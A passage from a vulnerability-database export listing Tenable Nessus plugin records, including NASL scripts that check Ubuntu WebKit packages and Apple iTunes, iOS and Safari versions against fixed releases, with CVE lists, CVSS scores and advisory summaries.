script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2020 Canonical, Inc. / NASL script (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|17\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 17.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.20.1-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.20.1-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.20.1-0ubuntu0.17.10.1\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.20.1-0ubuntu0.17.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4.0-18 / libwebkit2gtk-4.0-37\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:32:41", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.7.4. It is, therefore, affected by multiple vulnerabilities in WebKit as referenced in the HT208694 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-04-03T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.7.4 WebKit Multiple Vulnerabilities (credentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4101", "CVE-2018-4113", "CVE-2018-4114", "CVE-2018-4117", "CVE-2018-4118", "CVE-2018-4119", "CVE-2018-4120", "CVE-2018-4121", "CVE-2018-4122", "CVE-2018-4125", "CVE-2018-4127", "CVE-2018-4128", "CVE-2018-4129", "CVE-2018-4130", "CVE-2018-4144", "CVE-2018-4146", "CVE-2018-4161", "CVE-2018-4163", "CVE-2018-4165"], "modified": "2019-04-05T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_7_4.NASL", "href": "https://www.tenable.com/plugins/nessus/108795", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108795);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/04/05 23:25:09\");\n\n script_cve_id(\n \"CVE-2018-4101\",\n \"CVE-2018-4113\",\n \"CVE-2018-4114\",\n \"CVE-2018-4117\",\n \"CVE-2018-4118\",\n \"CVE-2018-4119\",\n \"CVE-2018-4120\",\n \"CVE-2018-4121\",\n \"CVE-2018-4122\",\n \"CVE-2018-4125\",\n \"CVE-2018-4127\",\n \"CVE-2018-4128\",\n \"CVE-2018-4129\",\n \"CVE-2018-4130\",\n \"CVE-2018-4144\",\n \"CVE-2018-4146\",\n \"CVE-2018-4161\",\n \"CVE-2018-4163\",\n \"CVE-2018-4165\"\n);\n script_bugtraq_id(102775);\n\n script_name(english:\"Apple iTunes < 12.7.4 WebKit Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.7.4. It is, therefore, affected by multiple vulnerabilities\nin WebKit as referenced in the HT208694 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208694\");\n script_set_attribute(attribute:\"solution\", value:\n \"Upgrade to Apple iTunes version 12.7.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4144\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"installed_sw/iTunes Version\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\n# Ensure this is Windows\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"iTunes Version\", win_local:TRUE);\n\nconstraints = [{\"fixed_version\" : \"12.7.4\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:32:51", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.7.4. It is, therefore, affected by multiple vulnerabilities in WebKit as referenced in the HT208694 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-04-03T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.7.3 WebKit Multiple Vulnerabilities (uncredentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4101", "CVE-2018-4113", "CVE-2018-4114", "CVE-2018-4117", "CVE-2018-4118", "CVE-2018-4119", "CVE-2018-4120", "CVE-2018-4121", "CVE-2018-4122", "CVE-2018-4125", "CVE-2018-4127", "CVE-2018-4128", "CVE-2018-4129", "CVE-2018-4130", "CVE-2018-4144", "CVE-2018-4146", "CVE-2018-4161", "CVE-2018-4163", "CVE-2018-4165"], "modified": "2019-11-08T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_7_4_BANNER.NASL", "href": "https://www.tenable.com/plugins/nessus/108796", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108796);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\n \"CVE-2018-4101\",\n \"CVE-2018-4113\",\n \"CVE-2018-4114\",\n \"CVE-2018-4117\",\n \"CVE-2018-4118\",\n \"CVE-2018-4119\",\n \"CVE-2018-4120\",\n \"CVE-2018-4121\",\n \"CVE-2018-4122\",\n \"CVE-2018-4125\",\n \"CVE-2018-4127\",\n \"CVE-2018-4128\",\n \"CVE-2018-4129\",\n \"CVE-2018-4130\",\n \"CVE-2018-4144\",\n \"CVE-2018-4146\",\n \"CVE-2018-4161\",\n \"CVE-2018-4163\",\n \"CVE-2018-4165\"\n );\n script_bugtraq_id(102775);\n\n script_name(english:\"Apple iTunes < 12.7.3 WebKit Multiple Vulnerabilities (uncredentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.7.4. It is, therefore, affected by multiple vulnerabilities\nin WebKit as referenced in the HT208694 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208474\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.7.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4144\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Peer-To-Peer File Sharing\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_sharing.nasl\");\n script_require_keys(\"iTunes/sharing\");\n script_require_ports(\"Services/www\", 3689);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:3689, embedded:TRUE, ignore_broken:TRUE);\n\nget_kb_item_or_exit(\"iTunes/\" + port + \"/enabled\");\n\ntype = get_kb_item_or_exit(\"iTunes/\" + port + \"/type\");\nsource = get_kb_item_or_exit(\"iTunes/\" + port + \"/source\");\nversion = get_kb_item_or_exit(\"iTunes/\" + port + \"/version\");\n\nif (type != 'Windows') audit(AUDIT_OS_NOT, \"Windows\");\n\nfixed_version = \"12.7.4\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) < 0)\n{\n report = '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"iTunes\", port, version);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-21T18:10:49", "description": "The version of Apple iOS running on the mobile device is prior to 12.1. It is, therefore, affected by multiple vulnerabilities. The highest of which could allow an attacker to perform a remote code execution attack by enticing a user to view malicious web content.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-12-13T00:00:00", "type": "nessus", "title": "Apple iOS < 12.1.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4303", "CVE-2018-4429", "CVE-2018-4430", "CVE-2018-4431", "CVE-2018-4435", "CVE-2018-4436", "CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4439", "CVE-2018-4440", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4445", "CVE-2018-4446", "CVE-2018-4447", "CVE-2018-4460", "CVE-2018-4461", "CVE-2018-4464", "CVE-2018-4465"], "modified": "2022-07-19T00:00:00", "cpe": ["cpe:/o:apple:iphone_os"], "id": "APPLE_IOS_1211_CHECK.NBIN", "href": "https://www.tenable.com/plugins/nessus/119610", "sourceData": "Binary data apple_ios_1211_check.nbin", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:27:14", "description": "The version of Apple iOS running on the mobile device is prior to 12.1.1. It is, therefore, affected by multiple vulnerabilities. The highest of which could allow an attacker to perform a remote code execution attack by enticing a user to view malicious web content.", "cvss3": {"score": 6.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"}, "published": "2019-04-17T00:00:00", "type": "nessus", "title": "Apple iOS < 12.1.1 Multiple Vulnerabilities (APPLE-SA-2018-12-05-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4464", "CVE-2018-4435", "CVE-2018-4461", "CVE-2018-4447", "CVE-2018-4465", "CVE-2018-4303", "CVE-2018-4460", "CVE-2018-4429", "CVE-2018-4436", "CVE-2018-4439", "CVE-2018-4431", "CVE-2018-4445", "CVE-2018-4440", "CVE-2018-4446", "CVE-2018-4430"], "modified": "2019-04-17T00:00:00", "cpe": ["cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*"], "id": "700555.PRM", "href": "https://www.tenable.com/plugins/nnm/700555", "sourceData": "Binary data 700555.prm", "cvss": {"score": 6.8, "vector": "CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:27:14", "description": "The version of Apple Safari installed on the remote host is prior to 11.1. It is, therefore, affected by multiple vulnerabilities as described in the HT208695 security advisory.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-04-08T00:00:00", "type": "nessus", "title": "Apple Safari < 11.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4101", "CVE-2018-4113", "CVE-2018-4114", "CVE-2018-4117", "CVE-2018-4118", "CVE-2018-4119", "CVE-2018-4120", "CVE-2018-4121", "CVE-2018-4122", "CVE-2018-4125", "CVE-2018-4127", "CVE-2018-4128", "CVE-2018-4129", "CVE-2018-4133", "CVE-2018-4146", "CVE-2018-4161", "CVE-2018-4162", "CVE-2018-4163", "CVE-2018-4165", "CVE-2018-4130", "CVE-2018-4102", "CVE-2018-4116", "CVE-2018-4137"], "modified": "2019-04-08T00:00:00", "cpe": ["cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*"], "id": "700503.PRM", "href": "https://www.tenable.com/plugins/nnm/700503", "sourceData": "Binary data 700503.prm", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:35:42", "description": "The version of Apple iTunes installed on the remote macOS or Mac OS X host is prior to 12.6.2. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple out-of-bounds read errors exist in the libxml2 component due to improper handling of specially crafted XML documents. An unauthenticated, remote attacker can exploit these to disclose user information.\n (CVE-2017-7010, CVE-2017-7013)\n\n - Multiple memory corruption issues exist in the Webkit Web Inspector component due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit these, via a specially crafted web page, to corrupt memory, resulting in the execution of arbitrary code. (CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit component due to improper validation of input. An unauthenticated, remote attacker can exploit these issues, via a specially crafted web page, to execute arbitrary code. (CVE-2017-7018, CVE-2017-7020, CVE-2017-7030, CVE-2017-7034, CVE-2017-7037, CVE-2017-7039, CVE-2017-7040, CVE-2017-7041, CVE-2017-7042, CVE-2017-7043, CVE-2017-7046, CVE-2017-7048, CVE-2017-7049, CVE-2017-7052, CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to execute arbitrary code. (CVE-2017-7019)\n\n - A flaw exists in the iPodService component when handling the iPodManager COM control due to insufficient access restrictions. A local attacker can exploit this to execute arbitrary code with system privileges.\n (CVE-2017-7053)\n\n - An unspecified memory initialization issue exists in Webkit. A local attacker can exploit this, via a specially crafted application, to disclose the contents of restricted memory. (CVE-2017-7064)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-25T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.6.2 Multiple Vulnerabilities (macOS) (credentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7010", "CVE-2017-7012", "CVE-2017-7013", "CVE-2017-7018", "CVE-2017-7019", "CVE-2017-7020", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7039", "CVE-2017-7040", "CVE-2017-7041", "CVE-2017-7042", "CVE-2017-7043", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7049", "CVE-2017-7052", "CVE-2017-7053", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7061", "CVE-2017-7064"], "modified": "2019-11-12T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "MACOS_ITUNES_12_6_2.NASL", "href": "https://www.tenable.com/plugins/nessus/101956", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101956);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-7010\",\n \"CVE-2017-7012\",\n \"CVE-2017-7013\",\n \"CVE-2017-7018\",\n \"CVE-2017-7019\",\n \"CVE-2017-7020\",\n \"CVE-2017-7030\",\n \"CVE-2017-7034\",\n \"CVE-2017-7037\",\n \"CVE-2017-7039\",\n \"CVE-2017-7040\",\n \"CVE-2017-7041\",\n \"CVE-2017-7042\",\n \"CVE-2017-7043\",\n \"CVE-2017-7046\",\n \"CVE-2017-7048\",\n \"CVE-2017-7049\",\n \"CVE-2017-7052\",\n \"CVE-2017-7053\",\n \"CVE-2017-7055\",\n \"CVE-2017-7056\",\n \"CVE-2017-7061\",\n \"CVE-2017-7064\"\n );\n script_bugtraq_id(\n 99879,\n 99884,\n 99885,\n 99889,\n 99890\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-07-19-6\");\n\n script_name(english:\"Apple iTunes < 12.6.2 Multiple Vulnerabilities (macOS) (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote macOS or Mac OS X\nhost is prior to 12.6.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Multiple out-of-bounds read errors exist in the libxml2\n component due to improper handling of specially crafted\n XML documents. An unauthenticated, remote attacker can\n exploit these to disclose user information.\n (CVE-2017-7010, CVE-2017-7013)\n\n - Multiple memory corruption issues exist in the Webkit\n Web Inspector component due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit these, via a specially crafted web page, to\n corrupt memory, resulting in the execution of arbitrary\n code. (CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit\n component due to improper validation of input. An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted web page, to execute\n arbitrary code. (CVE-2017-7018, CVE-2017-7020,\n CVE-2017-7030, CVE-2017-7034, CVE-2017-7037,\n CVE-2017-7039, CVE-2017-7040, CVE-2017-7041,\n CVE-2017-7042, CVE-2017-7043, CVE-2017-7046,\n CVE-2017-7048, CVE-2017-7049, CVE-2017-7052,\n CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page\n Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted web page, to execute arbitrary\n code. (CVE-2017-7019)\n\n - A flaw exists in the iPodService component when handling\n the iPodManager COM control due to insufficient access\n restrictions. A local attacker can exploit this to\n execute arbitrary code with system privileges.\n (CVE-2017-7053)\n\n - An unspecified memory initialization issue exists in\n Webkit. A local attacker can exploit this, via a\n specially crafted application, to disclose the contents\n of restricted memory. (CVE-2017-7064)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207928\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.6.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7053\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_itunes_detect.nasl\");\n script_require_keys(\"Host/MacOSX/Version\", \"installed_sw/iTunes\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\napp_info = vcf::get_app_info(app:\"iTunes\");\n\nconstraints = [{\"fixed_version\" : \"12.6.2\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:35:38", "description": "Versions of iTunes prior to 12.6.2 are affected by the following vulnerabilities:\n\n - Multiple out-of-bounds read errors exist in the libxml2 component due to improper handling of specially crafted XML documents. An unauthenticated, remote attacker can exploit these to disclose user information. (CVE-2017-7010, CVE-2017-7013)\n - Multiple memory corruption issues exist in the Webkit Web Inspector component due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit these, via a specially crafted web page, to corrupt memory, resulting in the execution of arbitrary code. (CVE-2017-7012)\n - Multiple memory corruption issues exist in the WebKit component due to improper validation of input. An unauthenticated, remote attacker can exploit these issues, via a specially crafted web page, to execute arbitrary code. (CVE-2017-7018, CVE-2017-7020, CVE-2017-7030, CVE-2017-7034, CVE-2017-7037, CVE-2017-7039, CVE-2017-7040, CVE-2017-7041, CVE-2017-7042, CVE-2017-7043, CVE-2017-7046, CVE-2017-7048, CVE-2017-7049, CVE-2017-7052, CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n - A memory corruption issue exists in the 'WebKit Page Loading' component due to improper validation of input. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to execute arbitrary code. (CVE-2017-7019)\n - A flaw exists in the iPodService component when handling the iPodManager COM control due to insufficient access restrictions. A local attacker can exploit this to execute arbitrary code with system privileges. (CVE-2017-7053)\n - An unspecified memory initialization issue exists in Webkit. A local attacker can exploit this, via a specially crafted application, to disclose the contents of restricted memory. (CVE-2017-7064) ", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-27T00:00:00", "type": "nessus", "title": "iTunes < 12.6.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7012", "CVE-2017-7018", "CVE-2017-7019", "CVE-2017-7020", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7039", "CVE-2017-7040", "CVE-2017-7041", "CVE-2017-7042", "CVE-2017-7043", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7049", "CVE-2017-7052", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7061", "CVE-2017-7064", "CVE-2017-7053", "CVE-2017-7010", "CVE-2017-7013"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:apple:itunes:*:*:*:*:*:*:*:*"], "id": "700168.PRM", "href": "https://www.tenable.com/plugins/nnm/700168", "sourceData": "Binary data 700168.prm", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:35:46", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.6.2. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple out-of-bounds read errors exist in the libxml2 component due to improper handling of specially crafted XML documents. An unauthenticated, remote attacker can exploit these to disclose user information.\n (CVE-2017-7010, CVE-2017-7013)\n\n - Multiple memory corruption issues exist in the Webkit Web Inspector component due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit these, via a specially crafted web page, to corrupt memory, resulting in the execution of arbitrary code. (CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit component due to improper validation of input. An unauthenticated, remote attacker can exploit these issues, via a specially crafted web page, to execute arbitrary code. (CVE-2017-7018, CVE-2017-7020, CVE-2017-7030, CVE-2017-7034, CVE-2017-7037, CVE-2017-7039, CVE-2017-7040, CVE-2017-7041, CVE-2017-7042, CVE-2017-7043, CVE-2017-7046, CVE-2017-7048, CVE-2017-7049, CVE-2017-7052, CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to execute arbitrary code. (CVE-2017-7019)\n\n - A flaw exists in the iPodService component when handling the iPodManager COM control due to insufficient access restrictions. A local attacker can exploit this to execute arbitrary code with system privileges.\n (CVE-2017-7053)\n\n - An unspecified memory initialization issue exists in Webkit. A local attacker can exploit this, via a specially crafted application, to disclose the contents of restricted memory. (CVE-2017-7064)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-25T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.6.2 Multiple Vulnerabilities (credentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7010", "CVE-2017-7012", "CVE-2017-7013", "CVE-2017-7018", "CVE-2017-7019", "CVE-2017-7020", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7039", "CVE-2017-7040", "CVE-2017-7041", "CVE-2017-7042", "CVE-2017-7043", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7049", "CVE-2017-7052", "CVE-2017-7053", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7061", "CVE-2017-7064"], "modified": "2019-11-12T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_6_2.NASL", "href": "https://www.tenable.com/plugins/nessus/101954", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101954);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-7010\",\n \"CVE-2017-7012\",\n \"CVE-2017-7013\",\n \"CVE-2017-7018\",\n \"CVE-2017-7019\",\n \"CVE-2017-7020\",\n \"CVE-2017-7030\",\n 